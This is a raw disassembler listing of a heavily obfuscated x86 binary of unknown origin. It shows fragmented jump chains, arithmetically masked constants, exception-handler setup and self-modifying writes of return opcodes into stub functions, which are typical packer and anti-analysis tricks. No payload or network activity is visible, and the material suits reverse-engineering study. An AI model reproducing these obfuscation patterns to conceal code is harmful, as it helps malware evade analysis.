loc_450584: ; CODE XREF: ut7h7i2x:loc_44B2E0j
push offset loc_43F40B
jmp locret_439210
; ---------------------------------------------------------------------------
mov eax, 0F074E076h
push offset sub_451A7D
jmp loc_445E8E
; ---------------------------------------------------------------------------
loc_45059D: ; DATA XREF: sub_4508DB+6F33o
push eax
call sub_4554BD
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jz loc_4403D1
jmp loc_45A2CC
; ---------------------------------------------------------------------------
locret_4505B5: ; CODE XREF: ut7h7i2x:loc_445E93j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_4505B6: ; CODE XREF: sub_447EB5-29F1j
jmp loc_4598A6
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B789
loc_4505BB: ; CODE XREF: sub_44B789-AFE8j
jmp loc_444FBF
; END OF FUNCTION CHUNK FOR sub_44B789
; =============== S U B R O U T I N E =======================================
sub_4505C0 proc near ; DATA XREF: ut7h7i2x:00448E55o
mov [ebp-28h], eax
loc_4505C3: ; CODE XREF: sub_43999F+11j
push esi
push offset loc_44A90E
jmp nullsub_503
sub_4505C0 endp
; =============== S U B R O U T I N E =======================================
sub_4505CE proc near ; CODE XREF: ut7h7i2x:00453205j
; sub_455DE7+9p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004525CE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004533BF SIZE 00000014 BYTES
xchg esi, [esp+0]
pop esi
push 45341FDh
xchg ebp, [esp+0]
mov esi, ebp
loc_4505DC: ; CODE XREF: ut7h7i2x:004398DAj
pop ebp
and esi, 5C417A9Eh
add esi, 0CF150E37h
jmp loc_4533BF
sub_4505CE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B68F
loc_4505EE: ; CODE XREF: sub_44B68F:loc_4468A1j
jz loc_4392F5
jmp loc_43BDB3
; END OF FUNCTION CHUNK FOR sub_44B68F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C8F3
loc_4505F9: ; CODE XREF: sub_44C8F3-124Dj
sub edx, 6267056Ch
shr eax, 1
jmp loc_456DE0
; END OF FUNCTION CHUNK FOR sub_44C8F3
; =============== S U B R O U T I N E =======================================
sub_450606 proc near ; CODE XREF: sub_4489DF-D852p
; ut7h7i2x:00452D88j
arg_0 = dword ptr 4
xchg edi, [esp+0]
pop edi
add esi, 0C4AC06h
xchg esi, [esp-4+arg_0]
jmp sub_43AA94
sub_450606 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4396F5
loc_450618: ; CODE XREF: sub_4396F5+ACE4j
shl [ebp+var_8], 8
jmp loc_44C613
; ---------------------------------------------------------------------------
loc_450621: ; CODE XREF: sub_4396F5:loc_4443C1j
; sub_4396F5:loc_45416Aj
mov eax, [ebp+var_C]
cmp byte ptr [eax], 0
jnz loc_453D80
mov eax, [ebp+var_4]
jmp loc_43AE2C
; END OF FUNCTION CHUNK FOR sub_4396F5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_164. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455060
loc_450636: ; CODE XREF: sub_455060-94A4j
jmp nullsub_210
; END OF FUNCTION CHUNK FOR sub_455060
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44939A
loc_45063B: ; CODE XREF: sub_44939A+13j
jmp sub_43CD08
; END OF FUNCTION CHUNK FOR sub_44939A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_450640: ; CODE XREF: sub_43DBEC+94BDj
jmp sub_442872
; END OF FUNCTION CHUNK FOR sub_43DBEC
; =============== S U B R O U T I N E =======================================
sub_450645 proc near ; CODE XREF: sub_4431A3+7p
; ut7h7i2x:00453235j
; FUNCTION CHUNK AT 0043AFBC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B7A1 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0043C3DC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E860 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00446036 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00448943 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F0C8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004537F3 SIZE 0000000B BYTES
xchg ebx, [esp+0]
pop ebx
mov [ebp-4], eax
jmp loc_44F0C8
sub_450645 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_450651 proc near ; CODE XREF: sub_4544E6-1A83Ap
; sub_4544E6-70ECp
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043C438 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044920C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044CB14 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044E259 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00453835 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00456704 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00458094 SIZE 00000005 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
jmp loc_453835
sub_450651 endp
; ---------------------------------------------------------------------------
loc_45065C: ; CODE XREF: ut7h7i2x:00456EF3j
jge loc_439C0E
; =============== S U B R O U T I N E =======================================
sub_450662 proc near ; CODE XREF: ut7h7i2x:00447493p
xchg edi, [esp+0]
pop edi
mov byte ptr [eax], 0C3h
jmp sub_44E5AB
sub_450662 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_45066E proc near ; CODE XREF: sub_40207D+B3p
; ut7h7i2x:0043C310j
; DATA XREF: ...
push edi
push 0A0F48F76h
pop edi
jmp loc_456595
sub_45066E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_45067A: ; CODE XREF: sub_4549F0-17DBCj
jnz loc_44CE80
adc ecx, 5C3C4B2Dh
loc_450686: ; CODE XREF: sub_4549F0:loc_43CC20j
and eax, 987AEF1Ah
call sub_44F10F
; END OF FUNCTION CHUNK FOR sub_4549F0
; START OF FUNCTION CHUNK FOR sub_43BBF3
loc_450691: ; CODE XREF: sub_43BBF3:loc_43FF43j
; sub_440CEC:loc_454E6Aj
mov ds:dword_41D164, eax
lea eax, nullsub_23
mov byte ptr [eax], 0C3h
jmp loc_43D66E
; END OF FUNCTION CHUNK FOR sub_43BBF3
; ---------------------------------------------------------------------------
call nullsub_10
jmp loc_4458DE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F071
loc_4506AF: ; CODE XREF: sub_43F071:loc_44F062j
and ecx, 6A6AB4B7h
or ecx, 6A46C0A9h
xor ecx, 905F7B49h
add ecx, ebp
call sub_459BF0
jz loc_458608
jmp loc_445D1F
; END OF FUNCTION CHUNK FOR sub_43F071
; =============== S U B R O U T I N E =======================================
sub_4506D3 proc near ; DATA XREF: ut7h7i2x:004577AEo
; FUNCTION CHUNK AT 0044442F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444BDA SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044DCAB SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00454694 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00456189 SIZE 00000006 BYTES
ror eax, 0Ch
call sub_4540AE
loc_4506DB: ; CODE XREF: ut7h7i2x:0043F271j
jmp loc_454694
sub_4506D3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B847
loc_4506E0: ; CODE XREF: sub_43B847:loc_44AAC2j
mov [edi], eax
pop edi
mov dword ptr [ebp-0Ch], 1
loc_4506EA: ; CODE XREF: ut7h7i2x:004467D2j
; ut7h7i2x:0044E5FAj
push 2881E19h
adc eax, 33AEFFB6h
jmp loc_4581CE
; END OF FUNCTION CHUNK FOR sub_43B847
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4551D3
loc_4506FA: ; CODE XREF: sub_4551D3+Ej
or ebx, 0C7314A59h
add ebx, 10451C97h
mov [ebx], eax
pop ebx
call sub_43F117
jmp loc_44952A
; END OF FUNCTION CHUNK FOR sub_4551D3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_368. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_450714 proc near ; CODE XREF: sub_44E261p
; FUNCTION CHUNK AT 004427A3 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00458FB9 SIZE 00000005 BYTES
push large dword ptr fs:0
mov large fs:0, esp
mov eax, [eax]
mov eax, 1
jmp loc_4427A3
sub_450714 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_19. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
add eax, offset nullsub_19
mov byte ptr [eax], 0C3h
jmp loc_43D3D6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_45073C: ; CODE XREF: sub_452D3D-11351j
jl loc_43D782
ror ecx, 3
loc_450745: ; CODE XREF: sub_452D3D-180E4j
; ut7h7i2x:00442C90j
rol esi, 4
jnb loc_43EFE1
loc_45074E: ; CODE XREF: sub_4545FB+138Ej
xor eax, 488FE58Bh
add eax, 0E69D691Ah
xchg eax, [esp-4+arg_0]
jmp sub_43AED9
; END OF FUNCTION CHUNK FOR sub_452D3D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45854D
loc_450762: ; CODE XREF: sub_45854D-25F3j
jz loc_43B9DA
jmp loc_4574EA
; END OF FUNCTION CHUNK FOR sub_45854D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_45076D proc near ; DATA XREF: ut7h7i2x:0044BDA4o
xchg ebx, [esp+0]
mov ebp, esp
push ecx
mov esp, ebp
push offset loc_45ABF1
jmp nullsub_552
sub_45076D endp
; ---------------------------------------------------------------------------
jmp ds:off_41D158
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_450785: ; CODE XREF: sub_43DBEC+D9DEj
jmp loc_455879
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4456B6
loc_45078A: ; CODE XREF: sub_4456B6+Ej
jmp loc_451DC5
; END OF FUNCTION CHUNK FOR sub_4456B6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_45078F: ; CODE XREF: sub_44F495-F85Fj
; sub_43ED59+101F7j ...
xchg ebp, [esp+0]
mov edx, ebp
pop ebp
jnb loc_44772B
mov eax, [esp+0]
jmp loc_4404D7
; END OF FUNCTION CHUNK FOR sub_44F495
; ---------------------------------------------------------------------------
loc_4507A3: ; DATA XREF: sub_43C943:loc_441411o
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
push 6B4B33E9h
pop eax
sub eax, 0E112D912h
jmp loc_45544A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E6B4
loc_4507BA: ; CODE XREF: sub_44E6B4-11D3Cj
mov ebx, [esi]
jmp loc_446913
; END OF FUNCTION CHUNK FOR sub_44E6B4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_4507C1: ; CODE XREF: sub_43AB62:loc_45930Bj
push offset loc_439DA7
jmp loc_455A09
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_4507CB: ; CODE XREF: sub_44BF76-B17Ej
; sub_44B5CF:loc_4549B5j
jz loc_43DB3E
jmp loc_4417D0
; END OF FUNCTION CHUNK FOR sub_44B5CF
; ---------------------------------------------------------------------------
locret_4507D6: ; CODE XREF: ut7h7i2x:loc_457723j
retn
; ---------------------------------------------------------------------------
loc_4507D7: ; CODE XREF: ut7h7i2x:004550FAj
jmp loc_4526B3
; ---------------------------------------------------------------------------
loc_4507DC: ; CODE XREF: ut7h7i2x:004455C5j
jmp loc_455E2E
; ---------------------------------------------------------------------------
loc_4507E1: ; DATA XREF: sub_452CBB+55B0o
call sub_44ED9F
push eax
ror eax, 9
mov ds:dword_44A89C, eax
retn
; ---------------------------------------------------------------------------
loc_4507F1: ; CODE XREF: ut7h7i2x:00457557j
jmp loc_449936
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_4507F6: ; CODE XREF: sub_444029+950j
jmp loc_44B7C5
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
loc_4507FB: ; CODE XREF: ut7h7i2x:00440C61j
jmp loc_43B44F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45601B
loc_450800: ; CODE XREF: sub_45601B:loc_455F6Aj
; ut7h7i2x:00459DB1j
push offset sub_44C99C
jmp nullsub_242
; END OF FUNCTION CHUNK FOR sub_45601B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_45080A: ; CODE XREF: sub_448321:loc_44874Dj
jl loc_44183F
loc_450810: ; CODE XREF: sub_4462B0+8F57j
jmp loc_44DFE6
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44947D
loc_450815: ; CODE XREF: sub_44947D+Fj
jmp loc_446E64
; END OF FUNCTION CHUNK FOR sub_44947D
; ---------------------------------------------------------------------------
jo loc_43CD52
and esi, 0FF51DBC8h
jmp loc_44183F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4471CA
loc_45082B: ; CODE XREF: sub_4471CA:loc_451933j
add edx, 6DD23699h
or edx, ds:4000FAh
add edx, 486F2FC0h
xchg edx, [esp+4+var_4]
jmp loc_44DFDC
; END OF FUNCTION CHUNK FOR sub_4471CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_450845: ; CODE XREF: sub_457A66-1BBF2j
; sub_455060:loc_45445Bj
mov eax, [ebp+var_4]
cmp byte ptr [eax], 0F1h
jnz loc_44B51E
jmp loc_43B98F
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
jnp loc_445BBB
jmp sub_447CBE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439FD5
loc_450861: ; CODE XREF: sub_439FD5+1B05Aj
jz loc_451917
jmp loc_457925
; END OF FUNCTION CHUNK FOR sub_439FD5
; ---------------------------------------------------------------------------
loc_45086C: ; CODE XREF: ut7h7i2x:00441C2Ej
xchg ecx, [esp]
mov edx, ecx
pop ecx
mov eax, [esp]
jmp loc_444F42
; ---------------------------------------------------------------------------
test ebp, 9F884971h
jmp loc_44ADDA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_450885: ; CODE XREF: sub_453E14-18F20j
ja loc_4494D8
loc_45088B: ; CODE XREF: sub_453E14:loc_4466E7j
inc eax
mov [ebp-2Ch], eax
mov dword ptr [ebp-20h], 0FFFFFFFFh
loc_450896: ; CODE XREF: sub_453E14-14269j
jb loc_43CEC3
cmp dword ptr [ebp-20h], 0
jge loc_444E40
jmp loc_43BC0E
; END OF FUNCTION CHUNK FOR sub_453E14
; ---------------------------------------------------------------------------
pop edx
mov eax, [esp]
push edx
call sub_44C273
mov eax, 11E35Ch
jmp loc_443B7B
; ---------------------------------------------------------------------------
loc_4508BF: ; DATA XREF: sub_43A0DA:loc_43F417o
mov edi, [edi]
add eax, edi
pop edi
add eax, 18h
mov [ebp-4], eax
push offset sub_43B847
jmp loc_44FFD9
; ---------------------------------------------------------------------------
loc_4508D4: ; DATA XREF: sub_459111-1A551o
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A45
loc_4508D6: ; CODE XREF: sub_443A45-2FC2j
jmp nullsub_409
; END OF FUNCTION CHUNK FOR sub_443A45
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4508DB proc near ; CODE XREF: sub_440E5F+Bp
; sub_443A65:loc_4419BBp ...
var_20 = byte ptr -20h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043C9C9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043E7D0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F516 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0043FEEA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440C86 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448517 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E05F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044F15E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FEAD SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00453327 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004553D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045637C SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045780B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00459CF4 SIZE 0000001A BYTES
push ebx
mov ebx, ebp
xchg ebx, [esp+0]
mov ebp, esp
push ecx
mov [ebp+var_4], eax
jmp loc_4553D4
sub_4508DB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458CD2
loc_4508EC: ; CODE XREF: sub_458CD2-17937j
sub eax, 855D5B40h
call sub_448568
loc_4508F7: ; CODE XREF: ut7h7i2x:0044E321j
jmp loc_45647D
; END OF FUNCTION CHUNK FOR sub_458CD2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_4508FC: ; CODE XREF: sub_439BD1+150B7j
xor eax, 0DA94B45Fh
jmp loc_45793C
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
loc_450907: ; CODE XREF: ut7h7i2x:004412D3j
push offset loc_453B99
jmp loc_454433
; ---------------------------------------------------------------------------
loc_450911: ; DATA XREF: sub_45601B:loc_45A74Eo
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_43AB9D
jmp loc_439E3C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_522. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CA2D
loc_450923: ; CODE XREF: sub_43CA2D+980Fj
jmp loc_44309B
; END OF FUNCTION CHUNK FOR sub_43CA2D
; ---------------------------------------------------------------------------
loc_450928: ; CODE XREF: ut7h7i2x:loc_43D0A6j
jz loc_43A8C9
jmp loc_45875A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D797
loc_450933: ; CODE XREF: sub_43D797+1C3B1j
pop ecx
push offset sub_4460A2
jmp nullsub_399
; END OF FUNCTION CHUNK FOR sub_43D797
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4580B3
loc_45093E: ; CODE XREF: sub_4580B3:loc_44664Cj
jz loc_44F367
jmp loc_45ACCA
; END OF FUNCTION CHUNK FOR sub_4580B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_450949: ; CODE XREF: sub_439B67:loc_4415B4j
; sub_452B14-9E45j
sub edi, 34B68E79h
xor edi, 21935A39h
add edi, 0F2EE8814h
xchg edi, [esp+0]
jmp sub_43F3D1
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449D3B
loc_450963: ; CODE XREF: sub_449D3B+732Aj
call sub_44AC75
; END OF FUNCTION CHUNK FOR sub_449D3B
; START OF FUNCTION CHUNK FOR sub_446F9A
loc_450968: ; CODE XREF: sub_446F9A:loc_454FF9j
sub al, 99h
mov edx, [ebp-4]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_458445
jmp loc_45A6D0
; END OF FUNCTION CHUNK FOR sub_446F9A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_553. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3D0
loc_45097D: ; CODE XREF: sub_44A3D0+1j
jmp loc_450146
; END OF FUNCTION CHUNK FOR sub_44A3D0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4586D6
loc_450982: ; CODE XREF: sub_4586D6-11F18j
jmp sub_45292B
; END OF FUNCTION CHUNK FOR sub_4586D6
; =============== S U B R O U T I N E =======================================
sub_450987 proc near ; DATA XREF: ut7h7i2x:0044F885o
; FUNCTION CHUNK AT 00446697 SIZE 00000005 BYTES
xchg ebx, [esp+0]
jmp loc_446697
sub_450987 endp
; ---------------------------------------------------------------------------
call sub_4499DC
; START OF FUNCTION CHUNK FOR sub_448321
loc_450994: ; CODE XREF: sub_448321-19F3j
jge loc_459201
pushf
loc_45099B: ; CODE XREF: sub_448321:loc_446923j
add esi, 4F893BEEh
mov [esi], eax
jmp loc_452B09
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
jz loc_44E1B3
jmp sub_43E7EC
; ---------------------------------------------------------------------------
xchg ecx, esi
jmp loc_442094
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44261F
loc_4509BA: ; CODE XREF: sub_44261F+8325j
and eax, 0AFD14F77h
sub eax, 51D311AAh
or eax, 8200588Ch
js loc_44972F
loc_4509D2: ; CODE XREF: ut7h7i2x:004415A9j
jmp loc_44BEC8
; END OF FUNCTION CHUNK FOR sub_44261F
; ---------------------------------------------------------------------------
add eax, esi
jmp loc_44972C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EB88
loc_4509DE: ; CODE XREF: sub_44EB88:loc_456CDEj
mov byte ptr [eax], 0C3h
jmp loc_454B3E
; END OF FUNCTION CHUNK FOR sub_44EB88
; ---------------------------------------------------------------------------
push ecx
push 0EE907152h
pop ecx
jmp loc_44FA0D
; ---------------------------------------------------------------------------
mov ds:off_41D09C, eax
lea eax, loc_454E5A
mov byte ptr [eax], 0C3h
jmp loc_4496AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440FC3
loc_450A06: ; CODE XREF: sub_440FC3+13E98j
mov eax, [esp-4+arg_0]
push edx
push offset loc_44D81B
jmp nullsub_339
; END OF FUNCTION CHUNK FOR sub_440FC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_450A14: ; CODE XREF: sub_444273+1047Dj
jnz loc_454745
jmp loc_447B0C
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
mov eax, 4CF1C9EDh
call sub_43AA94
mov ds:dword_41D110, eax
lea eax, nullsub_471
mov byte ptr [eax], 0C3h
jmp loc_439D33
; ---------------------------------------------------------------------------
loc_450A3D: ; CODE XREF: ut7h7i2x:0045440Fj
jnz loc_441A2E
jmp loc_458A67
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_450A48 proc near ; CODE XREF: sub_454277:loc_44321Ej
push ebp
mov ebp, esp
push offset loc_43D892
jmp loc_44B54E
sub_450A48 endp
; =============== S U B R O U T I N E =======================================
sub_450A55 proc near ; CODE XREF: ut7h7i2x:004436E1p
; ut7h7i2x:00457EE4j
xchg ecx, [esp+0]
pop ecx
call sub_43AA94
mov ds:dword_41D15C, eax
lea eax, nullsub_216
jmp loc_43DAB3
sub_450A55 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_565. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44928D
loc_450A70: ; CODE XREF: sub_44928D+3AE8j
jmp loc_4459D5
; END OF FUNCTION CHUNK FOR sub_44928D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C20D
loc_450A75: ; CODE XREF: sub_44C20D+Aj
jmp loc_448417
; END OF FUNCTION CHUNK FOR sub_44C20D
; ---------------------------------------------------------------------------
mov esi, 0C321FF28h
jmp sub_451F89
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458CBB
loc_450A84: ; CODE XREF: sub_458CBB-5440j
; sub_458CBB:loc_457B99j
xor eax, 0B65116B6h
add eax, ebp
add eax, 75F90BF6h
mov eax, [eax]
mov al, [eax]
jmp loc_44A96C
; END OF FUNCTION CHUNK FOR sub_458CBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445FA9
loc_450A9B: ; CODE XREF: sub_445FA9+FE80j
xchg esi, edi
loc_450A9D: ; CODE XREF: sub_445FA9+FE78j
sub eax, 0C78EC8A9h
add eax, 364D5AACh
xchg eax, [esp+0]
jmp loc_44714A
; END OF FUNCTION CHUNK FOR sub_445FA9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D79C
loc_450AB1: ; CODE XREF: sub_44D79C:loc_43BA6Fj
xor edi, ds:4000F5h
add edi, 0F421F802h
add eax, edi
pop edi
mov dword ptr [eax], 594C4C4Fh
jmp loc_444931
; END OF FUNCTION CHUNK FOR sub_44D79C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_560. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_450ACC: ; CODE XREF: ut7h7i2x:00445230j
jmp sub_452361
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_450AD1: ; CODE XREF: sub_444EAA-B4A6j
jmp loc_43D4F9
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CB0D
loc_450AD6: ; CODE XREF: sub_43CB0D:loc_451FDFj
jnz loc_457861
jmp loc_43E375
; END OF FUNCTION CHUNK FOR sub_43CB0D
; ---------------------------------------------------------------------------
test al, al
jz loc_451FE4
jmp loc_44200F
; ---------------------------------------------------------------------------
loc_450AEE: ; CODE XREF: ut7h7i2x:loc_45A1D7j
call sub_44ED9F
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jz loc_43BA7B
jmp loc_453724
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453C2C
loc_450B05: ; CODE XREF: sub_453C2C:loc_449E54j
mov ebp, esp
push ecx
push offset loc_43EACE
jmp nullsub_176
; END OF FUNCTION CHUNK FOR sub_453C2C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_450B12: ; CODE XREF: sub_444029:loc_43CB55j
add edi, 840A09B2h
xor eax, edi
jmp loc_4424C0
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
cmp dword ptr [ebp-0Ch], 0
jz loc_4484D7
jmp loc_44E31B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DE22
loc_450B2E: ; CODE XREF: sub_43DE22+18j
test ebx, 20h
jmp loc_4411CC
; END OF FUNCTION CHUNK FOR sub_43DE22
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_450B39: ; CODE XREF: sub_447CBE-56CCj
call sub_4482AE
; END OF FUNCTION CHUNK FOR sub_447CBE
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_450B3E: ; CODE XREF: sub_443BC5+8F9Dj
jmp loc_4575EE
; END OF FUNCTION CHUNK FOR sub_443BC5
; ---------------------------------------------------------------------------
locret_450B43: ; CODE XREF: ut7h7i2x:00439103j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_450B44: ; CODE XREF: sub_4503C3+955Aj
jmp nullsub_392
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
loc_450B49: ; CODE XREF: ut7h7i2x:0044E32Ej
jmp loc_45A991
; ---------------------------------------------------------------------------
loc_450B4E: ; CODE XREF: ut7h7i2x:004435D4j
sub eax, ebp
test ebp, eax
jmp loc_44CACF
; ---------------------------------------------------------------------------
loc_450B57: ; CODE XREF: ut7h7i2x:00440133j
xor ebp, edx
jmp loc_43BC29
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BDF1
loc_450B5E: ; CODE XREF: sub_44BDF1:loc_44A23Bj
mov eax, [eax]
push eax
push 28h
mov eax, [ebp-4]
push eax
call sub_43B83C
jmp loc_445178
; END OF FUNCTION CHUNK FOR sub_44BDF1
; ---------------------------------------------------------------------------
loc_450B71: ; CODE XREF: ut7h7i2x:loc_43BCDCj
; ut7h7i2x:0043BCEAj
rol eax, 0Bh
add eax, 3B6BB7Fh
rol eax, 11h
add eax, 0A4D2BDFAh
call sub_45A693
; START OF FUNCTION CHUNK FOR sub_44602A
loc_450B88: ; CODE XREF: sub_44602A-9FA5j
test ebx, edx
jmp loc_45026A
; END OF FUNCTION CHUNK FOR sub_44602A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4456F4
loc_450B8F: ; CODE XREF: sub_4456F4-B6DEj
jl loc_4481B9
loc_450B95: ; CODE XREF: sub_44261F+7120j
jmp loc_43C3F1
; END OF FUNCTION CHUNK FOR sub_4456F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440B52
loc_450B9A: ; CODE XREF: sub_440B52-3B36j
jmp loc_456A28
; END OF FUNCTION CHUNK FOR sub_440B52
; ---------------------------------------------------------------------------
jns loc_4491EA
jz loc_43B676
jnb loc_455CEE
xchg eax, [ecx]
jle loc_440150
jmp loc_4481B9
